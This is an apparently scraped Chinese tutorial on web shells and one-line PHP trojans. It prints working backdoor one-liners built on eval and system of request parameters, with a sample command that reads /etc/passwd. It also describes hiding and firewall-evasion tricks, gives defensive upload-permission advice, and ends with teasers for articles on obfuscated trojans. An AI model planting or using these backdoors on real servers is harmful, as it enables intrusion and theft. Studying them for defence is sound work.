web shell和一句木馬編寫 安全防範措施

2021-10-05 01:36:38 字數 1941 閱讀 4293

webshell就是以asp、php、jsp或者cgi等網頁檔案形式存在的一種命令執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了乙個**後,通常會將asp或php後門檔案與**伺服器

web目錄下正常的網頁檔案混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到乙個命令執行環境,以達到控制**伺服器的目的。

顧名思義,「web」的含義是顯然需要伺服器開放web服務,「shell」的含義是取得對伺服器某種程度上操作許可權。webshell常常被稱為入侵者通過**埠對**伺服器的某種程度上操作的許可權。由於webshell其大多是以動態指令碼的形式出現,也有人稱之為**的後門工具。

編輯另一方面,被入侵者利用,從而達到控制**伺服器的目的。這些網頁指令碼常稱為web指令碼木馬,比較流行的asp或php木馬,也有基於.net的指令碼木馬與jsp指令碼木馬。國內常用的webshell有海陽asp木馬,phpspy,c99shell等。

小馬: 一句話木馬也稱為小馬,即整個shell**量只有一行, -一般是系統執行函式

大馬:**量和功能比小多,一般會進行二次編碼加密,防止被安全防火牆/入侵系統檢測到

#### shell1. php      #eval使用php函式,例如phpinfo();-------request只能在url那傳自己的檔案

​<?php eval($_request['gmd']);?>

​ shell1.php?gmd=phpinfo();

#### shell2. php  #system使用l inux系統命令,例如ls, cp, rm

​<?php system($_request['test']);?>

​ shell3php?test=cat /etc/passwd

#### 中國菜刀

shell3.php

​<?php @eval($_post[chopper]);?>

或<?php eval($_post[gmd]);?>  

說明: request是在網頁端輸入變數訪問,post則是使用像中國菜刀之類的工具連線,是c/s架構。

木馬

方法一: windows命令:

`方法二: edjpgcom

編輯

webshell後門具有隱蔽性,一般有隱藏在正常檔案中並修改檔案時間達到隱蔽的,還有利用伺服器漏洞進行隱藏,如 "..." 目錄就可以達到,站長從ftp中找到的是含有「..」的資料夾,而且沒有許可權刪除,還有一些隱藏的webshell,可以隱藏於正常檔案帶引數執行指令碼後門。

webshell可以穿越伺服器防火牆,由於與被控制的伺服器或遠端過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在**的web日誌中留下一些資料提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。

編輯從根本上解決動態網頁指令碼的安全問題,要做到防注入、防爆庫、防cookies欺騙、防跨站攻擊(xss)等等,務必配置好伺服器fso許可權。最小的許可權=最大的安全。防範webshell的最有效方法就是:可寫目錄不給執行許可權,有執行許可權的目錄不給寫許可權。防範方法:

1、建議使用者通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程式。

2、對asp上傳程式的呼叫一定要進行身份認證,並只允許信任的人使用上傳程式。

3、asp程式管理員的使用者名稱和密碼要有一定複雜性,不能過於簡單,還要注意定期更換。

5、要盡量保持程式是最新版本。

6、不要在網頁上加註後台管理程式登陸頁面的鏈結。

7、為防止程式有未知漏洞,可以在維護後刪除後台管理程式的登陸頁面,下次維護時再通過上傳即可。

8、要時常備份資料庫等重要檔案。

9、日常要多維護,並注意空間中是否有來歷不明的asp檔案。

10、盡量關閉**搜尋功能,利用外部搜尋工具,以防爆出資料。

11、利用白名單上傳檔案,不在白名單內的一律禁止上傳,上傳目錄許可權遵循最小許可權原

webshell一句話木馬

asp一句話木馬 eval request sb execute request sb execute request sb execute request sb loop loop execute request sb eval request chr 35 executeglobal reque...

webshell之一句話木馬變形

一句話木馬就是只需要一行 的木馬,短短一行 就能做到和大馬相當的功能。為了繞過waf的檢測,一句話木馬出現了無數中變形,但本質是不變的 木馬的函式執行了我們傳送的命令。我們如何傳送命令,傳送的命令如何執行?我們可以通過get post cookie 這三種方式向乙個 提交資料,一句話木馬用 get ...

一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。一句話木馬 服務端 是用於本地的html提交指令碼木馬檔案 就是我們要用來插入到asp檔案中的asp語句,不僅僅是以asp為字尾的資料庫檔案 該語句將回為觸發,接收入侵者通過客戶端提交的資料,執行並完成相應的操作,服務端的...